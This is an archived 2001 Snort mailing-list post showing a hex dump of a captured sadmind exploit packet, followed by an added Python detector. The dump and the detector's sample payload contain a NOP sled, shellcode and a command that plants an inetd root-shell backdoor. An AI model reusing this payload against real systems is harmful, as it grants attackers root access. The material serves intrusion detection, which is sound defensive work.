Snort mailing list archives

Different sadmind exploit


From: "Mayers, Philip J" <p.mayers () ic ac uk>
Date: Fri, 27 Jul 2001 12:19:33 +0100

We're seeing a new signature for the sadmind exploit:

Internet Protocol
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 1440
    Identification: 0x2ab5
    Flags: 0x04
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 237
    Protocol: UDP (0x11)
    Header checksum: 0xfcc3 (correct)
    Source: 206.173.228.101 (206.173.228.101)
    Destination: XXX.XXX.XXX.XXX (XXX.XXX.XXX.XXX)
User Datagram Protocol
    Source port: 42515 (42515)
    Destination port: 32772 (32772)
    Length: 1420
    Checksum: 0x3e3b (correct)
Data (1412 bytes)

   0  3b63 1f04 0000 0000 0000 0002 0001 8788   ;c..............
  10  0000 000a 0000 0001 0000 0001 0000 0020   ...............
  20  3b61 3d2e 0000 0009 6c6f 6361 6c68 6f73   ;a=.....localhos
  30  7400 0000 0000 0000 0000 0000 0000 0000   t...............
  40  0000 0000 0000 0000 0000 0000 0000 0000   ................
  50  0000 0000 0000 0000 0000 0000 0000 0000   ................
  60  0000 0000 0000 0006 0000 0000 0000 0000   ................
  70  0000 0000 0000 0004 0000 0000 0000 0004   ................
  80  0000 0000 0000 0000 0000 0000 0000 0004   ................
  90  0000 0000 0000 0000 0000 0000 0000 0000   ................
  a0  0000 0000 0000 0000 0000 0000 0000 0000   ................
  b0  0000 0000 0000 0000 0000 0000 0000 0000   ................
  c0  0000 04a9 0000 000e 4144 4d5f 4657 5f56   ........ADM_FW_V
  d0  4552 5349 4f4e 0000 0000 0003 0000 0004   ERSION..........
  e0  0000 0001 0000 0000 0000 0000 0000 0011   ................
  f0  4144 4d5f 434c 4945 4e54 5f44 4f4d 4149   ADM_CLIENT_DOMAI
 100  4e00 0000 0000 0009 0000 0434 0000 0434   N..........4...4
 110  ffff ffff efff a848 efff 9830 efff a848   .......H...0...H
<skip 0x200 bytes of same>
 330  efff 9830 efff a848 efff 9830 efff a848   ...0...H...0...H
 340  efff 9830 801b c00f 801b c00f 801b c00f   ...0............
<skip 0x100 bytes of same>
 460  801b c00f 801b c00f 20bf ffff 20bf ffff   ........ ... ...
 470  7fff ffff 9003 e05c 9222 2010 941b c00f   .......\." .....
 480  ec02 3ff0 ac22 8016 ae02 6010 ee22 3ff0   ..?.."....`.."?.
 490  ae05 e008 c02d ffff ee22 3ff4 ae05 e003   .....-..."?.....
 4a0  c02d ffff ee22 3ff8 ae05 c016 c02d ffff   .-..."?......-..
 4b0  c022 3ffc 8210 203b 91d0 2008 ffff ff95   ."?... ;.. .....
 4c0  ffff ffff ffff ffff ffff ffff 2f62 696e   ............/bin
 4d0  2f73 68ff 2d63 ff65 6368 6f20 2770 6373   /sh.-c.echo 'pcs
 4e0  6572 7665 7220 7374 7265 616d 2074 6370   erver stream tcp
 4f0  206e 6f77 6169 7420 726f 6f74 202f 6269    nowait root /bi
 500  6e2f 7368 2073 6820 2d69 2720 3e20 2f74   n/sh sh -i' > /t
 510  6d70 2f2e 663b 202f 7573 722f 7362 696e   mp/.f; /usr/sbin
 520  2f69 6e65 7464 202d 7320 2f74 6d70 2f2e   /inetd -s /tmp/.
 530  663b 2072 6d20 2d66 202f 746d 702f 2e66   f; rm -f /tmp/.f
 540  3bff ffff 0000 0000 0000 0000 0000 0009   ;...............
 550  4144 4d5f 4645 4e43 4500 0000 0000 0003   ADM_FENCE.......
 560  0000 0004 0000 029a 0000 0000 0000 0000   ................
 570  0000 0010 6e65 746d 6774 5f65 6e64 6f66   ....netmgt_endof
 580  6172 6773                                 args

Interestingly, there's no query to portmap immediately before this - ruserd
was running on this port, for example. The attacker seems to be guessing the
port. As I write, he's sweeping our class B.

Regards, 
Phil 

+----------------------------------+ 
| Phil Mayers, Network Support     | 
| Centre for Computing Services    | 
| Imperial College                 | 
+----------------------------------+ 

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
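The RPC header in the dump above, decoded, plus the payload checks a detector would key on. This is an added example by the editor, not code from the original post or from Snort. The 72-byte RPC header is copied byte for byte from the dump (XID through the AUTH_NULL verifier); the argument section after it is a constructed, shortened stand-in for the 1340 bytes in the post (address block, the repeated 801bc00f filler word, the command string from offset 0x4cc, and the closing ADM_FENCE record). The sled threshold and the marker strings are the editor's assumptions, not published rule content.

```python
import struct

# ONC RPC (RFC 1831) constants
RPC_CALL = 0
AUTH_UNIX = 1
SADMIND_PROG = 100232            # 0x00018788 in the dump: the sadmind RPC program number
SPARC_NOP = b"\x80\x1b\xc0\x0f"  # xor %o7,%o7,%g0 on SPARC; the filler word repeated in the dump

# First 0x48 bytes of the UDP payload, exactly as shown in the post.
RPC_HEADER = bytes.fromhex(
    "3b631f04 00000000 00000002 00018788"
    "0000000a 00000001 00000001 00000020"
    "3b613d2e 00000009 6c6f6361 6c686f73"
    "74000000 00000000 00000000 00000000"
    "00000000 00000000"
)

# Constructed, shortened stand-in for the 1340-byte argument section (assumption, not the full dump).
SAMPLE_ARGS = (
    b"\x00" * 16
    + b"\xef\xff\xa8\x48\xef\xff\x98\x30" * 8
    + SPARC_NOP * 32
    + b"/bin/sh\xff-c\xffecho 'pcserver stream tcp nowait root /bin/sh sh -i' > /tmp/.f; "
    + b"/usr/sbin/inetd -s /tmp/.f; rm -f /tmp/.f;\xff\xff\xff"
    + b"\x00" * 8
    + b"\x00\x00\x00\x09ADM_FENCE\x00\x00\x00"
)
SAMPLE_PAYLOAD = RPC_HEADER + SAMPLE_ARGS


def parse_rpc_call(payload: bytes) -> dict:
    """Decode an ONC RPC CALL header; returns its fields plus the undecoded procedure arguments."""
    if len(payload) < 32:
        raise ValueError("payload too short for an RPC call header")
    (xid, mtype, rpcvers, prog, vers, proc,
     cred_flavor, cred_len) = struct.unpack(">8I", payload[:32])
    if mtype != RPC_CALL:
        raise ValueError("not an RPC CALL message")
    off = 32
    cred = payload[off:off + cred_len]
    off += cred_len
    verf_flavor, verf_len = struct.unpack(">2I", payload[off:off + 8])
    off += 8 + verf_len
    info = {
        "xid": xid, "rpc_version": rpcvers, "program": prog,
        "version": vers, "procedure": proc,
        "cred_flavor": cred_flavor, "verf_flavor": verf_flavor,
        "args": payload[off:],
    }
    if cred_flavor == AUTH_UNIX:
        # AUTH_UNIX body: stamp, machine name (XDR string padded to 4 bytes), uid, gid, gid list
        stamp, name_len = struct.unpack(">2I", cred[:8])
        padded = (name_len + 3) & ~3
        info["stamp"] = stamp
        info["machine"] = cred[8:8 + name_len].decode("ascii", "replace")
        info["uid"], info["gid"] = struct.unpack(">2I", cred[8 + padded:16 + padded])
    return info


def sadmind_findings(payload: bytes, sled_min: int = 16) -> list:
    """Detection notes for one UDP payload, keyed on the RPC header rather than the destination port."""
    try:
        hdr = parse_rpc_call(payload)
    except (ValueError, struct.error):
        return []
    findings = []
    if hdr["program"] == SADMIND_PROG:
        findings.append("RPC CALL to sadmind (100232) v%d proc %d as uid %s from %r"
                        % (hdr["version"], hdr["procedure"], hdr.get("uid"), hdr.get("machine")))
    args = hdr["args"]
    sled = args.count(SPARC_NOP)
    if sled >= sled_min:                        # threshold is an assumption
        findings.append("SPARC filler sled: %d x 801bc00f" % sled)
    if b"/bin/sh" in args:
        findings.append("embedded /bin/sh string")
    if b"inetd -s /tmp/" in args:
        findings.append("inetd started on an attacker-written config under /tmp")
    return findings


if __name__ == "__main__":
    for line in sadmind_findings(SAMPLE_PAYLOAD):
        print(line)
```

Matching on the program number and credentials inside the RPC header is what the post's observation argues for: the sender never asked portmap and simply guessed 32772, so a rule tied to that port would miss the same call aimed at the next host where sadmind sits elsewhere. Run against the sample, the parser reports a call to program 100232, version 10, procedure 1, with an AUTH_UNIX credential claiming uid 0 on "localhost", and the three payload checks fire on the sled and the inetd command line.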

